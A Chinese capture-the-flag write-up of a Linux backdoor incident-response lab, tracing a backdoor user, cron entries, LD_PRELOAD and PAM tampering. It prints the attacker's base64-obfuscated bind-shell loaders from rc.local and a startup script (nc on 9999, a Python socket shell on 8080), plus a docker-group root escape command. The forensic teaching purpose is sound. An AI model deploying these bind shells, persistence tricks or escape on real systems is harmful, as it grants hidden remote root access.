玄机——Linux后门应急
登陆上去让我们查看一下后门用户,查看passwd文件直接发现一个backdoor用户,666盐都不盐了
然后我们需要ps -ef查看主机的所有运行的进程信息。查看到nc -lvp 9999 -c flag{infoFl4g}。然后我们需要审计9999端口是通过哪个配置文件启动的。我们需要先查看9999端口的进程。使用ps -aux指令查看启动该进程的启动命令。
user@ip-10-0-10-1:/var/log$ ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 491 1 0 08:27 ? 00:00:00 bash
root 497 0.0 0.0 2368 1720 ? S 08:27 0:00 nc -lvp 9999 -c
在使用-p指令查看此进程详细信息。其父进程ID为491,我们跟进查看491进程信息。而491是bash,那我们合理怀疑此进程为系统自动启动。使用systemctl status查看系统正在运行的服务状态
user@ip-10-0-10-1:/etc/systemd$ systemctl status
● ip-10-0-10-1
State: degraded
Jobs: 0 queued
Failed: 1 units
Since: Mon 2025-04-07 08:26:05 EDT; 28min ago
CGroup: /
├─docker
│ ├─f413fc5c74dee344c5cfd7049f0fafd8f3d85ba157b8c560f1deb65bf144718e
│ │ ├─1052 /bin/sh /var/www/start.sh
│ │ ├─1091 php-fpm: master process (/usr/local/etc/php-fpm.conf)
│ │ ├─1237 php-fpm: pool www
│ │ └─1238 php-fpm: pool www
│ └─045fc01553624d5fc8f27887fb69be1094700d24f29e13406b26933a62d0f614
│ ├─1209 nginx: master process nginx -g daemon off;
│ └─1298 nginx: worker process
├─user.slice
│ └─user-1000.slice
│ ├─user@1000.service
│ │ └─init.scope
│ │ ├─1394 /lib/systemd/systemd --user
│ │ └─1395 (sd-pam)
│ ├─session-2.scope
│ │ ├─1391 sshd: user [priv]
│ │ ├─1409 sshd: user@pts/0
│ │ ├─1410 -sh
│ │ ├─1420 python3 -c import pty;pty.spawn("/bin/bash")
│ │ ├─1421 /bin/bash
│ │ ├─1539 systemctl status
│ │ └─1540 pager
│ └─session-7.scope
│ ├─1429 sshd: user [priv]
│ ├─1435 sshd: user@notty
│ ├─1436 sh -c /usr/lib/openssh/sftp-server
│ └─1437 /usr/lib/openssh/sftp-server
├─init.scope
│ └─1 /sbin/init
└─system.slice
├─apache2.service
│ ├─535 /usr/sbin/apache2 -k start
│ ├─538 /usr/sbin/apache2 -k start
│ └─539 /usr/sbin/apache2 -k start
├─systemd-udevd.service
│ └─251 /lib/systemd/systemd-udevd
├─cron.service
│ └─473 /usr/sbin/cron -f
├─docker-compose-app.service
│ └─1277 python3
├─system-serial\x2dgetty.slice
│ └─serial-getty@ttyS0.service
│ └─628 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 tt
├─networking.service
│ └─399 /sbin/dhclient -4 -v -i -pf /run/dhclient.eth0.pid -lf /var
├─docker.service
│ ├─ 478 /usr/bin/dockerd
│ ├─ 630 containerd --config /var/run/docker/containerd/containerd.
│ ├─1033 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f413f
│ ├─1100 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
│ ├─1103 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 92
│ ├─1116 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
│ ├─1119 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 84
│ ├─1132 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
│ ├─1136 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 28
│ ├─1151 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-po
│ ├─1156 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 81
│ └─1186 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 045fc
├─systemd-journald.service
│ └─228 /lib/systemd/systemd-journald
├─ssh.service
│ └─645 /usr/sbin/sshd -D
├─rsyslog.service
│ └─474 /usr/sbin/rsyslogd -n -iNONE
├─rc-local.service
│ ├─491 bash
│ └─497 nc -lvp 9999 -c flag{infoFl4g}
├─dbus.service
│ └─477 /usr/bin/dbus-daemon --system --address=systemd: --nofork -
├─systemd-timesyncd.service
│ └─278 /lib/systemd/systemd-timesyncd
├─system-getty.slice
│ └─getty@tty1.service
│ └─629 /sbin/agetty -o -p -- \u --noclear tty1 linux
└─systemd-logind.service
└─476 /lib/systemd/systemd-logind
注意到rc-local.service起的服务。在etc目录下使用find查找名字带rc.local的文件,最终在rc.d下找到了rc.local
user@ip-10-0-10-1:/etc/rc.d$ cat rc.local
#!/bin/bash
echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash &
exit 0
经base64解码得知其就是我们要找的目标服务。接下来需要找到黑客记录的每个用户登录密码的日志。通过翻找找到tmp目录下的.sshlog文件。通过ps -aux,我们还找到一个属于user的python3,PID为1277.再netstat查找一下端口信息,发现8080在监听。所以此RCE进程为python3+8080
接下来查杀开机启动的后门服务名称。
systemctl list-unit-files --type=service | grep enable
user@ip-10-0-10-1:~$ systemctl list-unit-files --type=service | grep enable
apache2.service enabled
apparmor.service enabled
autovt@.service enabled
cloud-config.service enabled
cloud-final.service enabled
cloud-init-local.service enabled
cloud-init.service enabled
console-setup.service enabled
cron.service enabled
dbus-org.freedesktop.timesync1.service enabled
docker-compose-app.service enabled
docker.service enabled
getty@.service enabled
keyboard-setup.service enabled
networking.service enabled
rc-local.service enabled
rc.local.service enabled
rsyslog.service enabled
ssh.service enabled
sshd.service enabled
syslog.service enabled
systemd-fsck-root.service enabled-runtime
systemd-timesyncd.service enabled
使用systemctl查看docker进程,并定位到启动的配置文件。
user@ip-10-0-10-1:~$ systemctl status docker-compose-app.service
● docker-compose-app.service - Docker Compose Application
Loaded: loaded (/etc/systemd/system/docker-compose-app.service; enabled; vend
Active: failed (Result: exit-code) since Mon 2025-04-07 08:28:04 EDT; 50min a
Process: 1375 ExecStart=/bin/bash /usr/lib/python3.7/site-packages/docker/star
Process: 1390 ExecStop=/usr/bin/docker-compose down (code=exited, status=203/E
Main PID: 1375 (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 2356)
Memory: 45.0M
CGroup: /system.slice/docker-compose-app.service
/etc/systemd/system/docker-compose-app.service文件查询过没有问题。我们再查看/usr/lib/python3.7/site-packages/docker下的文件。
user@ip-10-0-10-1:/usr/lib/python3.7/site-packages/docker$ cat startup.sh
#!/bin/bash
/usr/local/bin/docker-compose -f /home/user/nginx/docker-compose.yml up -d
echo 'import base64;v=base64.b64decode("aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcwoKIyBDcmVhdGUgc29ja2V0IG9iamVjdApzID0gc29ja2V0LnNvY2tldCgpCnMuYmluZCgoJycsIDgwODApKQpzLmxpc3RlbigxKQoKIyBDb250aW51b3VzbHkgYWNjZXB0IGNvbm5lY3Rpb25zCndoaWxlIFRydWU6CiAgICBjb25uLCBhZGRyID0gcy5hY2NlcHQoKQogICAgdHJ5OgogICAgICAgICMgTGF1bmNoIGJhc2ggc2hlbGwgY29ubmVjdGVkIHRvIHRoaXMgc29ja2V0CiAgICAgICAgc3VicHJvY2Vzcy5jYWxsKFsnL2Jpbi9iYXNoJ10sIHN0ZGluPWNvbm4sIHN0ZG91dD1jb25uLCBzdGRlcnI9Y29ubikKICAgIGZpbmFsbHk6CiAgICAgICAgIyBFbnN1cmUgdGhlIGNvbm5lY3Rpb24gaXMgY2xvc2VkIGFmdGVyIHVzZQogICAgICAgIGNvbm4uY2xvc2UoKQo=");exec(v)'|nohup python3 &
即为此文件。使用linpeas.sh检测提权配置,发现用户处于docker组,使用gtfobins键入如下指令即可。
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
使用journalctl 指令查看所有的日志,并尝试从中提取flag
root@d4969ec3d498:/home# journalctl | grep flag
Apr 07 08:28:00 ip-10-0-10-1 rc.local[479]: eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 9001
Apr 07 08:28:00 ip-10-0-10-1 rc.local[479]: lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
Apr 07 08:28:01 ip-10-0-10-1 CRON[960]: (root) CMD (echo flag{cr0nt4b_IRfind};^Mno crontab for root )
Apr 07 08:29:01 ip-10-0-10-1 CRON[1423]: (root) CMD (echo flag{cr0nt4b_IRfind};^Mno crontab for root
我们需要排查黑客植入的,以root用户执行cat用户就删除指定文件的操作。我们需要检查root用户的alias,即检查目标用户下的.bashrc和.bash_profile,以检查此用户是否通过修改启动文件来达成恶意行为。
# ~/.bashrc: executed by bash(1) for non-login shells.
# Note: PS1 and umask are already set in /etc/profile. You should not
# need this unless you want different defaults for root.
# PS1='${debian_chroot:+($debian_chroot)}\h:\w\$ '
# umask 022
# You may uncomment the following lines if you want `ls' to be colorized:
# export LS_OPTIONS='--color=auto'
# eval "`dircolors`"
# alias ls='ls $LS_OPTIONS'
# alias ll='ls $LS_OPTIONS -l'
# alias l='ls $LS_OPTIONS -lA'
export LD_PRELOAD=/home/user/Nomal.so
# Some more alias to avoid making mistakes:
# alias rm='rm -i'
# alias cp='cp -i'
# alias mv='mv -i'
发现LD_PRELOAD指向一个.so文件。我们再查看此文件下的内容。不会用IDA,需要使用IDA反编译查看内容。
最后黑客设置了万能密码,所以可以联想到攻击者篡改pam_unix.so文件,通过IDA反编译可得到万能密码ATMB6666。顺手学习一下Linux权限维持技术之PAM万能密码登录